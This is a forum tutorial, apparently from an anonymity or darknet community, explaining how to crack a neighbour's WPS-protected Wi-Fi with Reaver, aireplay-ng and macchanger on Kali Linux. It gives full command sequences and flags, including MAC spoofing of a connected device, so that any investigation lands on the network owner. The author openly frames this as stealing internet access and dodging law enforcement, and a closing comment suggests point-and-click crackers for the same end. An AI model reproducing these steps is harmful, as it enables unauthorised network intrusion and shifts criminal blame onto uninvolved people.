For all of you out there looking to really step up your OpSec here is a great way to do so. By piggy backing off of someone elses IP (and spoofing your MAC address while using their internet makes you completely anonymous whil browsing online. If for some reason your IP was leaked while using Tor and piggybacking off of someones network would lead the investigation directly to them (who would be able to claim 100% ignorance).
I would also like to add that since making this guide someone pointed out to me that FrankenScript does the same thing without having to know all of the codes and technical details. However I have not been able to successful attack using it.
Using my methods below I have cracked a few pins with the average time taking about 14 - 15 hours.
Any comments, critisisms, and questions welcome.
DISCLAIMER: The information I'm providing in this tutorial could be used for illegal activity. Please only use this for lawful purposes (yeah right, like none of us break the law here) and I am in no way responsible if you are somehow caught breaking the law.
Lingo / basic terminal commands:
AP = Access point, the network we are trying to test
Ctrl + C = stop action in terminal.
Now onto the fun.
If you were able to set up the following mostly on your own, this tutorial will be well within your skill sets / fairly easy to learn:
- Tails
- PGP
- Tor
You will need the following items to start this process:
- USB stick 16gb or greater
- Latest Kali Linux ISO Download Here
- Wireless Cards capable of packet injection List of recommended ones
- Blank DVD (optional)
- Computer you can boot Kali from (like Tails)
Once you have all of that we can go through the proccess of burning the Kali ISO to a Disc (or straight to a USB if you like). After installing from to the Disc I booted into Kali and used the installer included with Kali to install it on my 16gb USB drive. I then booted from my USB and made sure my USB wireless card was plugged in before booting (not required but your wireless card might be called something different than mine). This is a guide for Reaver so I'm not going into details of how to install Kali on a Disc / DVD it is almost exactly the same as Tails.
Kali Installation Guides:
Once booted into Kali we can start looking through the wireless activity around us.
Finding an AP to attack
Open a new terminal window and type the following command to list all of your wireless devices:
ifconfig
Output, I will be using "wlan0" for this Tutorial
Identifiy your wireless card from the list above, mine was wlan0, If yours is named something else put it in place of mine for this tutorial.
then put your wireless card into monitor mode with the command:
airmon-ng start wlan0
If any processes are found that could cause trouble you can kill them with the kill command (hitting enter after each line) like so:
kill 1028
kill 1174
kill 1419
kill 1418
For the kill lines if you get two processes that are numbered one after the other (1418 & 1419) kill the higher numbered one first (1419) other wise it will give you an error when trying to kill the second one.
Also please note your network card will change name when entering monitor mode. Mine is called "wlan0mon" now yours will be something similar.
After getting this ready we can find a network to "test." Use the following command to list all networks around you that have a WPS router that we can crack.
wash -i wlan0mon
This will list all of the vulnerable networks in your area, I have quite a few. Find a network with good power and make sure that the listing in the colum that reads "WPS Locked" says "No". If it says "Yes" in that colum our attack will not work. Take note of the networks BSSID and Channel number.
After identifying the AP we are testing you can go ahead and press Ctrl + C to stop the function. Take note of the BSSID and the Ch number we can get the info we need to perform our attack incognito.
Monitor just this network by using the command:
airodump-ng -c <ch #> --bssid <AP's bssid> wlan0mon
-c = channel number
--bssid = BSSID of target AP - you can use copy and paste to paste the BSSID in place
The lower set of numbers (BSSID and Station, We will refer to them as BSSID and AP-Station from here on out) are the numbers we need for the rest of this attack. That lower line of info will only show up if a device is connected to the router of the network. After getting this info you can go ahead and stop the function (Ctrl + C).
Now we will spoof our MAC for the attack. (This is optional but I do it to cover all my tracks)
go ahead and stop your monitor mode using this command:
airmon-ng stop wlan0mon
And then use this command to take your wireless device offline to change the MAC (wireless device interface has dropped the "mon" because we took it out of monitor mode):
ifconfig wlan0 down
Then change the MAC address for it using the "macchanger" command:
macchanger -m <AP Station> wlan0
Then issue this command to bring the Wireless device back up:
ifconfig wlan0 up
Then we will start monitor mode again on our wireless device again because we need to be in monitor mode for the attack.
airmon-ng start wlan0
by running "ifconfig" on wlan0mon we can see the MAC spoofing we just did on wlan0 did not carry over to our virtual wireless monitor device:
ifconfig wlan0mon
So we need to spoof our virtual monitor device's MAC now, same as before:
ifconfig wlan0mon down
Use the "macchanger" command again using the "AP Station" from our target network as our new MAC (note: All MAC addresses must match when using the reaver attack - so if spoofed they all need to be the same):
macchanger -m <AP Station> wlan0mon
and then we are going to bring the monitor device back up:
ifconfig wlan0mon up
Now our MAC is spoofed we are ready to beginn our attack. In two seperate terminal windows prepare the following commands:
reaver -i wlan0mon -b <bssid of target> -c 6 -N -d 8 -S -L -t 10 -r 3:30 --mac=<AP Station> -vv -A
Break down of what the options mean in reaver:
-c = Channel # of AP -N = No Nacks -d = delay after each pin attempt in seconds -S = dh-Small -t = time out time in seconds -L = ignore locks from AP -r X:Y = reoccuring rest, every X pin attempts rest Y seconds --mac= = spoof MAC address of where attack is coming from. THIS MUST MATCH THE MAC's YOU SPOOFED EARLIER known as <AP Station> -vv = very verbose, gives you details about what is happening -A = do not associate, telling reaver we will associate using another application.
There are more options in reaver, use this command to get a full list:
reaver --help
The second command to prep in a new terminal window is:
aireplay-ng -1 60 -a <BSSID> -h <AP Station> wlan0mon
breakdown of options for "aireplay"
-1 = associate repitition set in seconds (i.e re assosciate ever 60 seconds in my example) -a = target BSSID -h = MAC address that association is coming from (must be same as the MAC's we have spoofed previously, AKA <AP Station>
Command line preped for both Reaver and Aireplay
before we start these we need to open another new terminal window and run "airodump-ng" to make sure the "aireplay-ng" command is looking for the AP on the correct channel:
airodump-ng -c <ch #> --bssid <BSSID> wlan0mon
Once we have that running we can run our "aireplay-ng" command (leave "airodump-ng" running in the background) run the command we preped previously:
aireplay-ng -1 60 -a <BSSID> -h <AP Station> wlan0mon
After a "Association Successful :-)" you can go ahead and stop the "Airodump-ng" command (Ctrl + C):
Now that we are associated we can start the reaver attack. Go ahead and enter that command for reaver we prepped earlier:
reaver -i wlan0mon -b <bssid of target> -c <ch #> -N -d 8 -S -L -t 10 -r 3:30 --mac=<AP Station> -vv -A
This is where things get dicy. If you have made it this far you have done most of the work but each individual router is particular about the settings it needs to successfuly enter a pin over and over.
here is a succesfully entered pin:
There can be a lot of errors when trying to crack pins like this and this method can take between 4 hrs and 4 days. The first time I sucessfuly cracked a pin it took me roughly 14 hours.
If you do run into errors feel free to post them here and I will do my best to help or (better bet) google the error and you will probably find a solution, that is how I did all of my trouble shooting.
If reaver keeps giving you errors try different mixtures of delays and rest periods. Most routers don't like a source constantly trying pins and sending info like this so small breaks inbetween sets of pin attempts helps the router not freak out.
When cracking a WPS network with MAC spoofing on like this you will not get a password at the end of this cracking method. It will end and give you a WPS pin number (Store This Number!!). What you do with this is reset all of your MAC spoofing (unplug and plug back in your USB device) and then run the reaver attack again using the "-p" option with the pin number. So if reaver cracked the pin for you and it was "12345670" you would use this command (after resetting your MACs) to reveal the password:
reaver -i wlan0mon -b <bssid of target> -c <ch #> -b <BSSID> -N -L -d 8 -p 12345670 -vv -A
You also have to run the association application again while doing this:
aireplay-ng -1 60 -a <BSSID> wlan0mon
I forgot to take a screenshot from the last time I cracked a WiFi but here is what a fully complete reaver screen looks like with a password shown:
The WPS PSK is the password to the network for when you want to log in.
The WPS pin is super useful if the owner of the AP ever notices us stealing their interwebs and changes their password we can run reaver with this pin again and it will instantly spit us out the new password. So store these two pieces of info in a safe place.
Now we have the password so all that is left is to boot into tails, Spoof all of our MAC addresses (this option can be found in "more options" at the start menu), and log into the freshly cracked network.
I think this covers most of the basics of using reaver. Please feel free to comment with any questions, critisisms, or tips. If someone is interested I can post a quick guide to booting FrankenScript and using it, but again I have had more success with this method.
Enjoy guys and fuck CISA!
If you use Kali linux, there is a GUI tool called Fern-Wifi-Cracker and it's literally all point and click. Wifite is an automated version of Reaver.
Kali runs on a livecd/usb just like TAILS, so it's easy to boot up, crack your neighbors password, and reboot into your regular install.
Edit: You can download Kali for free here. The wordlists (needed for Fern) are located in /usr/share/wordlists when you boot into it.